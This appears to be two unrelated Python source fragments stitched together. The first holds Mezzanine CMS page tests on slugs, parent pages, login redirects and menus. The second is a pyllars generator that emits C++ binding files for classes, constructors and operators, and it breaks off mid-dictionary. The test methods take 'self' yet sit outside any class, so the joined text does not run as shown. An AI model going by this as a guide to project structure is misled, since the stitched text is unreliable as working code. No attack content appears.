    self.assertEqual(len(pages_for_slug[0]._ascendants), 0)
    self.reset_queries(connection)
    ascendants = pages_for_slug[0].get_ascendants()
    # One query per parent hop in the fallback path.
    self.assertEqual(len(connection.queries), 2)  # 2 parent queries
    self.assertEqual(pages_for_slug[0].id, tertiary.id)
    self.assertEqual(ascendants[0].id, secondary.id)
    self.assertEqual(ascendants[1].id, primary.id)
def test_set_parent(self):
    """
    Re-parenting a page should rewrite its slug (both in memory and in
    the database) each time, and making a page its own ancestor must
    raise ``AttributeError``.
    """
    old_parent, _ = RichTextPage.objects.get_or_create(title="Old parent")
    new_parent, _ = RichTextPage.objects.get_or_create(title="New parent")
    child, _ = RichTextPage.objects.get_or_create(
        title="Child", slug="kid")
    self.assertIsNone(child.parent)
    self.assertEqual(child.slug, "kid")

    def check_in_memory_and_db(page, expected_parent_id, expected_slug):
        # Verify the in-memory instance, then a freshly loaded copy.
        for instance in (page, RichTextPage.objects.get(id=page.id)):
            if expected_parent_id is None:
                self.assertIsNone(instance.parent)
            else:
                self.assertEqual(instance.parent_id, expected_parent_id)
            self.assertEqual(instance.slug, expected_slug)

    child.set_parent(old_parent)
    child.save()
    check_in_memory_and_db(child, old_parent.id, "old-parent/kid")
    child = RichTextPage.objects.get(id=child.id)
    child.set_parent(new_parent)
    child.save()
    check_in_memory_and_db(child, new_parent.id, "new-parent/kid")
    child = RichTextPage.objects.get(id=child.id)
    child.set_parent(None)
    child.save()
    check_in_memory_and_db(child, None, "kid")
    # An unsaved page picks up its slug from the new parent immediately.
    unsaved = RichTextPage(title="child2")
    unsaved.set_parent(new_parent)
    self.assertEqual(unsaved.slug, "new-parent/child2")
    # Assert that cycles are detected.
    p1, _ = RichTextPage.objects.get_or_create(title="p1")
    p2, _ = RichTextPage.objects.get_or_create(title="p2")
    p2.set_parent(p1)
    for cyclic_parent in (p1, p2, RichTextPage.objects.get(title="p2")):
        with self.assertRaises(AttributeError):
            p1.set_parent(cyclic_parent)
def test_set_slug(self):
    """
    Changing a parent page's slug should cascade into the slugs of its
    children, both in memory and once reloaded from the database.
    """
    parent, _ = RichTextPage.objects.get_or_create(
        title="Parent", slug="parent")
    child, _ = RichTextPage.objects.get_or_create(
        title="Child", slug="parent/child", parent_id=parent.id)
    parent.set_slug("new-parent-slug")
    self.assertEqual(parent.slug, "new-parent-slug")
    # Reload both pages and verify the change propagated.
    reloaded_parent = RichTextPage.objects.get(id=parent.id)
    self.assertEqual(reloaded_parent.slug, "new-parent-slug")
    reloaded_child = RichTextPage.objects.get(id=child.id)
    self.assertEqual(reloaded_child.slug, "new-parent-slug/child")
def test_login_required(self):
    """
    Pages flagged ``login_required`` should be excluded from published
    querysets for anonymous users, and requesting them while logged out
    should redirect to the login URL -- accounting for locale URL
    prefixes and for ``LOGIN_URL`` given as a view path or pattern name.
    """
    public, _ = RichTextPage.objects.get_or_create(
        title="Public", slug="public", login_required=False)
    private, _ = RichTextPage.objects.get_or_create(
        title="Private", slug="private", login_required=True)
    accounts_installed = ("mezzanine.accounts" in settings.INSTALLED_APPS)
    # Anonymous users should only see the public page...
    args = {"for_user": AnonymousUser()}
    self.assertTrue(public in RichTextPage.objects.published(**args))
    self.assertTrue(private not in RichTextPage.objects.published(**args))
    # ...while authenticated users see both.
    args = {"for_user": User.objects.get(username=self._username)}
    self.assertTrue(public in RichTextPage.objects.published(**args))
    self.assertTrue(private in RichTextPage.objects.published(**args))
    public_url = public.get_absolute_url()
    private_url = private.get_absolute_url()
    self.client.logout()
    response = self.client.get(private_url, follow=True)
    login_prefix = ""
    login_url = resolve_url(settings.LOGIN_URL)
    login_next = private_url
    try:
        # redirect_chain is only present on redirecting responses.
        redirects_count = len(response.redirect_chain)
        response_url = response.redirect_chain[-1][0]
    except (AttributeError, IndexError):
        redirects_count = 0
        response_url = ""
    if urlparse(response_url).path.startswith("/%s/" % get_language()):
        # With LocaleMiddleware a language code can be added at the
        # beginning of the path.
        login_prefix = "/%s" % get_language()
    if redirects_count > 1:
        # With LocaleMiddleware and a string LOGIN_URL there can be
        # a second redirect that encodes the next parameter.
        login_next = urlquote_plus(login_next)
    login = "%s%s?next=%s" % (login_prefix, login_url, login_next)
    if accounts_installed:
        # For an inaccessible page with mezzanine.accounts we should
        # see a login page, without it 404 is more appropriate than an
        # admin login.
        target_status_code = 200
    else:
        target_status_code = 404
    self.assertRedirects(response, login,
                         target_status_code=target_status_code)
    response = self.client.get(public_url, follow=True)
    self.assertEqual(response.status_code, 200)
    if accounts_installed:
        # View / pattern name redirect properly, without encoding next.
        login = "%s%s?next=%s" % (login_prefix, login_url, private_url)
        # Test if view name or URL pattern can be used as LOGIN_URL.
        with override_settings(LOGIN_URL="mezzanine.accounts.views.login"):
            # Note: With 1.7 this loops if the view app isn't installed.
            response = self.client.get(public_url, follow=True)
            self.assertEqual(response.status_code, 200)
            response = self.client.get(private_url, follow=True)
            self.assertRedirects(response, login)
        with override_settings(LOGIN_URL="login"):
            # Note: The "login" is a pattern name in accounts.urls.
            response = self.client.get(public_url, follow=True)
            self.assertEqual(response.status_code, 200)
            response = self.client.get(private_url, follow=True)
            self.assertRedirects(response, login)
    # Once logged in, both pages should be accessible under every
    # LOGIN_URL variant.
    self.client.login(username=self._username, password=self._password)
    response = self.client.get(private_url, follow=True)
    self.assertEqual(response.status_code, 200)
    response = self.client.get(public_url, follow=True)
    self.assertEqual(response.status_code, 200)
    if accounts_installed:
        with override_settings(LOGIN_URL="mezzanine.accounts.views.login"):
            response = self.client.get(public_url, follow=True)
            self.assertEqual(response.status_code, 200)
            response = self.client.get(private_url, follow=True)
            self.assertEqual(response.status_code, 200)
        with override_settings(LOGIN_URL="login"):
            response = self.client.get(public_url, follow=True)
            self.assertEqual(response.status_code, 200)
            response = self.client.get(private_url, follow=True)
            self.assertEqual(response.status_code, 200)
def test_page_menu_queries(self):
    """
    Test that rendering a page menu executes the same number of
    queries regardless of the number of pages or levels of
    children.
    """
    template = ('{% load pages_tags %}'
                '{% page_menu "pages/menus/tree.html" %}')
    # Measure with whatever pages already exist...
    baseline = self.queries_used_for_template(template)
    self.assertTrue(baseline > 0)
    # ...then add a nested tree of published pages and re-measure.
    self.create_recursive_objects(RichTextPage, "parent", title="Page",
                                  status=CONTENT_STATUS_PUBLISHED)
    self.assertEqual(baseline, self.queries_used_for_template(template))
def test_page_menu_flags(self):
    """
    Test that pages only appear in the menu templates they've been
    assigned to show in.
    """
    menu_ids = []
    created_pages = []
    template = "{% load pages_tags %}"
    for menu_id, label, path in settings.PAGE_MENU_TEMPLATES:
        menu_ids.append(menu_id)
        # Each page is assigned to every menu seen so far, so the first
        # page appears in all menus, the last in only one.
        created_pages.append(RichTextPage.objects.create(
            in_menus=list(menu_ids),
            title="Page for %s" % str(label),
            status=CONTENT_STATUS_PUBLISHED))
        template += "{%% page_menu '%s' %%}" % path
    output = Template(template).render(Context({}))
    for page in created_pages:
        self.assertEqual(output.count(page.title), len(page.in_menus))
def test_page_menu_default(self):
    """
    Test that the settings-defined default value for the ``in_menus``
    field is used, also checking that it doesn't get forced to text,
    but that sequences are made immutable.
    """
    with override_settings(
            PAGE_MENU_TEMPLATES=((8, "a", "a"), (9, "b", "b"))):
        cases = [
            (None, (8, 9)),      # None defaults to all configured menus
            (tuple(), tuple()),  # empty sequence means no menus
            ([9], (9,)),         # lists are stored as tuples
        ]
        for default, expected in cases:
            with override_settings(PAGE_MENU_TEMPLATES_DEFAULT=default):
                page = Page.objects.create()
                self.assertEqual(page.in_menus, expected)
def test_overridden_page(self):
    """
    Test that a page with a slug matching a non-page urlpattern
    return ``True`` for its overridden property.
    """
    # When BLOG_SLUG is empty, urlpatterns for pages are prefixed
    # with PAGES_SLUG, and generally won't be overridden. In this
    # case, there aren't any overriding URLs by default, so the
    # scenario can't be exercised.
    if PAGES_SLUG:
        # Report a skip instead of silently returning, so test output
        # doesn't count an unexercised scenario as a pass.
        self.skipTest("No overriding urlpatterns when pages are prefixed")
    page, created = RichTextPage.objects.get_or_create(slug="edit")
    self.assertTrue(page.overridden())
def test_unicode_slug_parm_to_processor_for(self):
    """
    Registering a page processor under a unicode slug should work
    under Python 2.x.
    """
    from mezzanine.pages.page_processors import processor_for

    @processor_for(u'test unicode string')
    def unicode_slug_processor(request, page):
        return {}

    page, _ = RichTextPage.objects.get_or_create(title="test page")
    result = unicode_slug_processor(current_request(), page)
    self.assertEqual(result, {})
@skipUnless(settings.USE_MODELTRANSLATION and len(settings.LANGUAGES) > 1,
            "modeltranslation configured for several languages required")
def test_page_slug_has_correct_lang(self):
    """
    Test that slug generation is done for the default language and
    not the active one.
    """
    from django.utils.translation import get_language, activate
    from django.utils.datastructures import SortedDict
    from mezzanine.utils.urls import slugify
    default_language = get_language()
    # All configured languages except the default one.
    code_list = SortedDict(settings.LANGUAGES)
    del code_list[default_language]
    title_1 = "Title firt language"
    title_2 = "Title second language"
    page, _ = RichTextPage.objects.get_or_create(title=title_1)
    # Activate the first non-default language that works.
    for code in code_list:
        try:
            activate(code)
        except:
            pass
        else:
            break
    else:
        # No valid language found
        page.delete()
        return
    # Save a different title under the activated (non-default)
    # language; the slug should still derive from the default-language
    # title.
    page.title = title_2
    page.save()
    self.assertEqual(page.get_slug(), slugify(title_1))
    self.assertEqual(page.title, title_2)
    activate(default_language)
    # Back in the default language the original title is visible again.
    self.assertEqual(page.title, title_1)
    page.delete()
def test_clean_slug(self):
    """
    Test that PageAdminForm strips leading and trailing slashes
    from slugs or returns `/`.
    """
    class TestPageAdminForm(PageAdminForm):
        class Meta:
            fields = ["slug"]
            model = Page

    # (submitted slug, expected cleaned slug)
    for submitted, expected in (("/", "/"), ("/hello/world/", "hello/world")):
        form = TestPageAdminForm(data={'slug': submitted})
        self.assertTrue(form.is_valid())
        self.assertEqual(form.cleaned_data['slug'], expected)
| |
import os
from typing import List, Optional
from pyllars.cppparser.parser.clang_translator import NodeType
from .generator import Generator
class CXXRecordDeclGenerator(Generator):
    """Generates pyllars binding code for a C++ class/struct/union declaration."""

    def generate(self):
        """
        Emit a header/body file pair declaring the ``PyllarsClass`` for this
        record.

        Returns:
            (header_path, body_path), or (None, None) when nothing should be
            generated (implicit declarations, or anonymous records with no
            usable C++ typename).
        """
        self._node.normalize()
        # Compiler-generated (implicit) declarations get no bindings.
        if 'implicit' in self._node.qualifiers:
            return None, None
        name = self._node.name or "anonymous_%s" % self._node.node_id
        # "typename" is not written in front of a union's name.
        typename_qualifier = "typename" if 'union' not in self._node.qualifiers else ""

        def find_typename(node: NodeType.Node, recurse: bool = False):
            # Resolve a C++ typename usable to reference this record, even
            # when it is anonymous (via decltype of an adjacent field, or by
            # recursing to an enclosing declaration).
            if node is None:
                return None
            if self._node.name:
                typename = f"{typename_qualifier} ::{self._node.full_cpp_name}"
            elif not self._node.parent:
                typename = None
            else:
                index = self._node.parent.children.index(self._node)
                if index < 0:
                    raise Exception("invalid code structure encountered")
                if len(self._node.parent.children) > index + 1 and isinstance(self._node.parent.children[index + 1],
                                                                              NodeType.FieldDecl):
                    # Anonymous record immediately followed by a field decl:
                    # name the type through decltype of that field.
                    field = self._node.parent.children[index + 1]
                    field_name = field.full_cpp_name
                    typename = f"decltype(::{field_name})" if field.name else None
                elif recurse and node.parent and not isinstance(node.parent, NodeType.NamespaceDecl):
                    return find_typename(node.parent, recurse)
                else:
                    typename = None
            return typename

        typename = find_typename(self._node)
        if not typename:
            return None, None
        header_stream = open(os.path.join(self.my_root_dir, name + '.hpp'), 'w',
                             encoding='utf-8')
        body_stream = open(os.path.join(self.my_root_dir, self._source_path_root, name + '.cpp'), 'w',
                           encoding='utf-8')
        try:
            parent = self._node.parent
            # generate body
            body_stream.write(f"#include <pyllars/pyllars_class.hpp>\n")
            body_stream.write(f"#include <{self.source_path}>\n")
            if self._node.name:
                body_stream.write(f"#include \"{self._node.name}.hpp\"\n\n")
            body_stream.write("namespace {\n")
            if isinstance(parent, NodeType.NamespaceDecl):
                if parent:
                    body_stream.write(f"""
            extern const char parent_fullnsname[] = "{parent.full_cpp_name}";
            using Parent = pyllars::NSInfo<parent_fullnsname>;
""")
                else:
                    # NOTE(review): unreachable in practice, since
                    # isinstance(None, ...) is False.  Fixed the emitted
                    # C++ here regardless: a single colon ("pyllars:GlobalNS")
                    # is not a valid scope qualifier.
                    body_stream.write("using Parent = pyllars::GlobalNS;\n")
            else:
                body_stream.write(f"using Parent = {find_typename(self._node.parent, True) or 'pyllars::GlobalNS'};\n")
            if self._node.bases:
                bases = ", " + ", ".join([c.full_name for c in self._node.bases])
            else:
                bases = ""
            body_stream.write("}\n\n")
            body_stream.write(f"template class pyllars::PyllarsClass<{typename}, Parent{bases}>;\n")
            body_stream.write(f"""
namespace __pyllars_internal{{
    template<>
    const char* const TypeInfo<{typename}>::type_name = \"{self._node.name if self._node.name else "<<anonymous type>>"}\";
}}
""")
        finally:
            header_stream.close()
            body_stream.close()
        return header_stream.name, body_stream.name
class DefinitionDataGenerator(Generator):
    """Placeholder generator: definition-data nodes produce no output files."""

    def generate(self):
        """Nothing to generate for this node type."""
        return None, None
class DefaultConstructorGenerator(Generator):
    """Generates a pyllars binding for a class's default constructor."""

    def generate(self):
        """
        Emit a .cpp file instantiating ``PyllarsClassConstructor`` with an
        empty keyword list.

        Returns:
            (None, body_path), or (None, None) when the enclosing class is
            anonymous or the constructor is constexpr-defaulted.
        """
        # The node sits two levels below the class declaration.
        parent = self._node.parent.parent
        class_name = self._node.parent.parent.name
        if not class_name:
            return None, None
        if 'default_is_constexpr' in self._node.classifiers:
            return None, None
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_constructor.cpp'), 'w',
            encoding='utf-8')
        try:
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
            body_stream.write("namespace {\n")
            body_stream.write("    static const char* const empty_list[] = {nullptr};\n")
            body_stream.write("}\n")
            body_stream.write(f"template class pyllars::PyllarsClassConstructor<empty_list, "
                              f"{self._node.parent.parent.full_cpp_name}>;")
        finally:
            body_stream.close()
        return None, body_stream.name
class CopyConstructorGenerator(Generator):
    """Generates a pyllars binding for a class's implicit copy constructor."""

    def generate(self):
        """
        Emit a .cpp file instantiating ``PyllarsClassConstructor`` taking a
        ``const T&`` argument.

        Returns:
            (None, body_path), or (None, None) for anonymous classes or for
            user-declared/unclassified constructors.
        """
        class_name = self._node.parent.parent.name
        if not class_name:
            return None, None
        # Only implicitly-declared copy constructors are handled here.
        if 'user_declared' in self._node.classifiers or not self._node.classifiers:
            return None, None
        class_full_cpp_name = self._node.parent.parent.full_cpp_name
        parent = self._node.parent.parent
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_copy_constructor.cpp'), 'w',
            encoding='utf-8')
        try:
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
            body_stream.write("using namespace pyllars;\nnamespace{\n")
            body_stream.write(" const char* const kwlist[] = {\"object\", nullptr};")
            body_stream.write("}\n\n")
            body_stream.write(f"template class PyllarsClassConstructor<kwlist, {class_full_cpp_name}, const {class_full_cpp_name}&>;")
        finally:
            body_stream.close()
        return None, body_stream.name
class MoveConstructorGenerator(Generator):
    """Generates a pyllars binding for a class's implicit move constructor."""

    def generate(self):
        """
        Emit a .cpp file instantiating ``PyllarsClassConstructor`` taking an
        rvalue-reference argument.

        Returns:
            (None, body_path), or (None, None) for anonymous classes or for
            user-declared/unclassified constructors.
        """
        class_name = self._node.parent.parent.name
        if not class_name:
            return None, None
        # Only implicitly-declared move constructors are handled here.
        if 'user_declared' in self._node.classifiers or not self._node.classifiers:
            return None, None
        class_full_cpp_name = self._node.parent.parent.full_cpp_name
        parent = self._node.parent.parent
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_move_constructor.cpp'), 'w',
            encoding='utf-8')
        try:
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <pyllars/pyllars_classconstructor.hpp>
""")
            body_stream.write("using namespace pyllars;\nnamespace{\n")
            body_stream.write(" const char* const kwlist[] = {\"object\", nullptr};")
            body_stream.write("}\n\n")
            # NOTE(review): this emits a ``const T&&`` parameter; a move
            # constructor conventionally takes ``T&&`` (a const rvalue cannot
            # be moved from) -- confirm intent before changing the output.
            body_stream.write(
                f"template class PyllarsClassConstructor<kwlist, {class_full_cpp_name}, const {class_full_cpp_name}&&>;")
        finally:
            body_stream.close()
        return None, body_stream.name
class CopyAssignmentGenerator(Generator):
    """Generates a pyllars binding for a class's implicit copy assignment."""

    def generate(self):
        """
        Emit a .cpp file exposing ``operator=`` as a Python method named
        "this".  The generated C++ guards the binding behind
        ``std::is_copy_assignable`` at compile time, because (per the
        comment emitted below) clang does not always report a deleted
        default assignment operator.

        Returns:
            (None, body_path), or (None, None) for anonymous classes or for
            user-declared/unclassified operators.
        """
        class_name = self._node.parent.parent.name
        if not class_name:
            return None, None
        if 'user_declared' in self._node.classifiers or not self._node.classifiers:
            return None, None
        class_full_cpp_name = self._node.parent.parent.full_cpp_name
        parent = self._node.parent.parent
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_copy_assignment.cpp'), 'w',
            encoding='utf-8')
        try:
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <cstddef>
#include <type_traits>
#include <pyllars/pyllars_classmethod.hpp>
""")
            body_stream.write(f"""
using namespace pyllars;
namespace {{
    //From: DefaultConstructorDeclGenerator.generate
    /**
     * clang does not properly delete default assignment operator, so must use compile-time check
     * instead to prevent compiler error from generated code that shouldn't be
     */
    template<const char* const name, const char* const kwlist[], typename T>
    static int template_set_up(){{
        if constexpr (std::is_copy_assignable<T>::value){{
            typedef T& (T::*method_t)(const T&);
            PyllarsClassMethod<name, kwlist, method_t, &T::operator= >();
        }}
        return 0;
    }}
    typedef const char* const kwlist_t[2];
    constexpr kwlist_t kwlist = {{"assign_to", nullptr}};
    constexpr cstring this_name = "this";
    const int status = template_set_up<this_name, kwlist, {class_full_cpp_name}>();
}}
""")
        finally:
            body_stream.close()
        return None, body_stream.name
class MoveAssignmentGenerator(Generator):
    """Generates a pyllars binding for a class's implicit move assignment."""

    def generate(self):
        """
        Emit a .cpp file exposing the move ``operator=`` as a Python method
        named "this", guarded at C++ compile time by
        ``std::is_move_assignable``.

        Returns:
            (None, body_path), or (None, None) for anonymous classes or for
            user-declared/unclassified operators.
        """
        class_name = self._node.parent.parent.name
        if not class_name:
            return None, None
        if 'user_declared' in self._node.classifiers or not self._node.classifiers:
            return None, None
        class_full_cpp_name = self._node.parent.parent.full_cpp_name
        parent = self._node.parent.parent
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        # Fixed output name: this generator previously wrote to
        # "<class> default_copy_assignment.cpp", clobbering the file
        # emitted by CopyAssignmentGenerator for the same class.
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + ' default_move_assignment.cpp'), 'w',
            encoding='utf-8')
        try:
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <cstddef>
#include <type_traits>
#include <pyllars/pyllars_classmethod.hpp>
""")
            # Move assignment is gated on is_move_assignable and takes T&&
            # (the original checked is_copy_assignable and used const T&&,
            # which cannot be moved from).
            body_stream.write(f"""
using namespace pyllars;
namespace {{
    //From: DefaultConstructorDeclGenerator.generate
    /**
     * clang does not properly delete default assignment operator, so must use compile-time check
     * instead to prevent compiler error from generated code that shouldn't be
     */
    template<const char* const name, const char* const kwlist[], typename T>
    static int template_set_up(){{
        if constexpr (std::is_move_assignable<T>::value){{
            typedef T& (T::*method_t)(T&&);
            PyllarsClassMethod<name, kwlist, method_t, &T::operator= >();
        }}
        return 0;
    }}
    typedef const char* const kwlist_t[2];
    constexpr kwlist_t kwlist = {{"assign_to", nullptr}};
    constexpr cstring this_name = "this";
    const int status = template_set_up<this_name, kwlist, {class_full_cpp_name}>();
}}
""")
        finally:
            body_stream.close()
        return None, body_stream.name
class CXXConstructorDeclGenerator(Generator):
    """Generates a pyllars binding for an explicitly declared C++ constructor."""

    def _scoped_type_name(self, typ):
        """
        Return *typ* with each non-keyword component fully qualified,
        resolved against enclosing declarations first, then siblings.
        """
        parts = typ.strip().split(' ')

        def full_name(t):
            if "::" in t:
                first, rest = t.split("::", maxsplit=1)
            else:
                first, rest = t, ""
            # search upward for enclosing definition
            parent = self._node
            while parent:
                if hasattr(parent, 'name') and parent.name == first:
                    return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
                parent = parent.parent
            # possibly an internally defined class or type:
            for child in self._node.parent.children:
                if hasattr(child, 'name') and child.name == t:
                    return '::' + child.full_cpp_name
            return t

        for index, typ in enumerate(parts):
            if not typ in self.KEYWORDS:
                parts[index] = full_name(typ)
        return ' '.join(parts)

    def _full_signature(self):
        """Build the member-function-pointer signature for this constructor."""
        qualifiers = self._node.signature.rsplit(')', maxsplit=1)[-1]
        params = [self._scoped_type_name(p.type_text) for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
        if '...' in self._node.signature:
            params.append("...")
        params = ", ".join(params)
        class_qualifier = f"(::{self._node.parent.full_cpp_name}::*)"
        return f"{class_qualifier}({params}) {qualifiers}"

    def generate(self):
        """
        Emit a .cpp file instantiating ``PyllarsClassConstructor`` for this
        constructor.  Returns (None, body_path).
        """
        class_name = self._node.parent.name
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + '::' + self._node.name.replace("/", " div") + self._node.signature + '.cpp'), 'w',
            encoding='utf-8')
        # All writes happen inside the try so the stream is closed even if
        # one of them raises (the original wrote before the try, and also
        # emitted the source include twice).
        try:
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classconstructor.hpp>
\n""")
            name = self._node.name
            kwlist = []
            args = []
            # Collect the trailing run of *named* parameters, walking from
            # the end.  Both lists are built with insert(0, ...) so they end
            # up in declaration order -- the original appended the arg types,
            # emitting the constructor parameter types in reverse order.
            for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
                if not c.name:
                    break
                kwlist.insert(0, f"\"{c.name}\"")
                args.insert(0, c.type_text)
            args = (", " + ", ".join(args)) if args else ""
            kwlist_items = ", ".join(kwlist + ["nullptr"])
            body_stream.write("namespace{\n")
            body_stream.write(f"    static const char* const kwlist[] = {{{kwlist_items}}};\n")
            body_stream.write(f"    constexpr cstring name = \"{name}\";\n")
            body_stream.write("}\n\n")
            body_stream.write(f"template class pyllars::PyllarsClassConstructor<kwlist, {self._node.parent.full_cpp_name} {args}>;")
        finally:
            body_stream.close()
        return None, body_stream.name
class CXXMethodDeclGenerator(Generator):
    """
    Generates pyllars bindings for a C++ method declaration, dispatching
    operators (assignment, arithmetic, subscript, ...) to dedicated paths.
    """

    def _scoped_type_name(self, typ):
        """
        Return *typ* with each non-keyword component fully qualified,
        resolved against enclosing declarations first, then siblings.
        """
        parts = typ.strip().split(' ')

        def full_name(t):
            if "::" in t:
                first, rest = t.split("::", maxsplit=1)
            else:
                first, rest = t, ""
            # search upward for enclosing definition
            parent = self._node
            while parent:
                if hasattr(parent, 'name') and parent.name == first:
                    return "::" + ("::".join([parent.full_cpp_name, rest]) if rest else parent.full_cpp_name)
                parent = parent.parent
            # possibly an internally defined class or type:
            for child in self._node.parent.children:
                if hasattr(child, 'name') and child.name == t:
                    return '::' + child.full_cpp_name
            return t

        for index, typ in enumerate(parts):
            if not typ in self.KEYWORDS:
                parts[index] = full_name(typ)
        return ' '.join(parts)

    def _full_signature(self):
        """
        Build the C++ function-pointer type for this method: a plain
        function pointer for static methods, a member-function pointer
        otherwise, with fully scoped return/parameter types.
        """
        is_static = 'static' in self._node.qualifiers
        ret_type = self._scoped_type_name(self._node.signature.split('(')[0])
        qualifiers = self._node.signature.rsplit(')', maxsplit=1)[-1]
        params = [self._scoped_type_name(p.type_text) for p in self._node.children if isinstance(p, NodeType.ParmVarDecl)]
        if '...' in self._node.signature:
            params.append("...")
        params = ", ".join(params)
        class_qualifier = f"(::{self._node.parent.full_cpp_name}::*)" if not is_static else "(*)"
        return f"{ret_type} {class_qualifier}({params}) {qualifiers}"

    def generate(self):
        """
        Emit a .cpp file binding this method via PyllarsClassMethod /
        PyllarsClassStaticMethod, delegating operators to
        ``generate_assignment`` / ``generate_operator`` (which take over and
        close the stream).  Returns (None, body_path), or (None, None) when
        no named enclosing scope exists.
        """
        class_name = self._node.parent.name
        parent = self._node.parent
        # Skip out of any anonymous enclosing records.
        while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
            parent = parent.parent
        if not parent:
            return None, None
        body_stream = open(
            os.path.join(self.my_root_dir, self._source_path_root, class_name + '::' + self._node.name.replace("/", " div") + self._node.signature + '.cpp'), 'w',
            encoding='utf-8')
        body_stream.write(f"""\n#include \"{self.source_path}\"\n\n""")
        # Pull in every named enclosing namespace for unqualified lookups.
        grand_parent = parent
        while grand_parent and grand_parent.name:
            if isinstance(grand_parent, NodeType.NamespaceDecl):
                body_stream.write(f"using namespace {grand_parent.full_cpp_name};\n")
            grand_parent = grand_parent.parent
        if self._node.name == "operator=":
            return self.generate_assignment(body_stream)
        if self._node.name.startswith("operator"):
            return self.generate_operator(body_stream)
        try:
            parent_name = parent.name
            # generate body
            if 'static' in self._node.qualifiers:
                method_qualifier = "Static"
                class_param = f"{self._node.parent.full_cpp_name}, "
                body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classstaticmethod.hpp>
""")
            else:
                method_qualifier = ""
                class_param = ""
                body_stream.write(f"""\n#include \"{self.source_path}\"
#include <pyllars/pyllars_classmethod.hpp>
\n""")
            name = self._node.name
            signature = self._full_signature()
            # Keyword names for the trailing run of *named* parameters,
            # kept in declaration order via insert(0, ...).
            kwlist = []
            for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
                if not c.name:
                    break
                kwlist.insert(0, f"\"{c.name}\"")
            kwlist_items = ", ".join(kwlist + ["nullptr"])
            body_stream.write("namespace{\n")
            body_stream.write(f"    static const char* const kwlist[] = {{{kwlist_items}}};\n")
            body_stream.write(f"    constexpr cstring name = \"{name}\";\n")
            body_stream.write("}\n\n")
            body_stream.write(f"template class pyllars::PyllarsClass{method_qualifier}Method<name, kwlist, {class_param}{signature}, &{self._node.full_cpp_name}>;")
        finally:
            body_stream.close()
        return None, body_stream.name

    def generate_assignment(self, body_stream):
        """
        Bind ``operator=`` as a Python-callable method named "this".
        Returns (None, body_path), or (None, None) for deleted operators
        or when no named enclosing scope exists.
        """
        if 'default_delete' in self._node.qualifiers:
            return None, None
        class_name = self._node.parent.name
        class_full_cpp_name = self._node.parent.full_cpp_name
        try:
            parent = self._node.parent
            while parent and not parent.name and isinstance(parent, NodeType.CXXRecordDecl):
                parent = parent.parent
            if not parent:
                return None, None
            parent_name = parent.name
            parent_header_path = os.path.join("..", parent_name)
            # generate body
            body_stream.write(f"""\n#include \"{self.source_path}\"
#include \"{parent_header_path}.hpp\"
#include <{self.source_path}>
#include <pyllars/pyllars_classmethod.hpp>
""")
            name = "this"
            signature = self._full_signature()
            kwlist = []
            for c in reversed([c for c in self._node.children if isinstance(c, NodeType.ParmVarDecl)]):
                if not c.name:
                    break
                kwlist.insert(0, f"\"{c.name}\"")
            if len(kwlist) == 1:
                # A single parameter is always exposed as "assign_to".
                # Bug fix: the replacement must keep the embedded quotes
                # that every other kwlist entry carries; the original wrote
                # ["assign_to"], emitting invalid C++ ({assign_to, nullptr}).
                kwlist = ["\"assign_to\""]
            kwlist_items = ", ".join(kwlist + ["nullptr"])
            body_stream.write("namespace{\n")
            body_stream.write(f"    static const char* const kwlist[] = {{{kwlist_items}}};\n")
            body_stream.write(f"    constexpr cstring name = \"{name}\";\n")
            body_stream.write("}\n\n")
            body_stream.write(f"template class pyllars::PyllarsClassMethod<name, kwlist, {signature}, &::{class_full_cpp_name}::operator= >;")
        finally:
            body_stream.close()
        return None, body_stream.name

    def generate_operator(self, body_stream):
        """
        Bind an overloaded operator (other than assignment) by mapping the
        C++ operator token to pyllars' unary/binary operator enums;
        ``operator[]`` becomes a map operator.  Raises for unknown
        operators or more than one parameter.
        """
        unary_mapping = {
            '~': 'pyllars::OpUnaryEnum::INV',
            '+': 'pyllars::OpUnaryEnum::POS',
            '-': 'pyllars::OpUnaryEnum::NEG',
        }
        binary_mapping = {
            '+': 'pyllars::OpBinaryEnum::ADD',
            '-': 'pyllars::OpBinaryEnum::SUB',
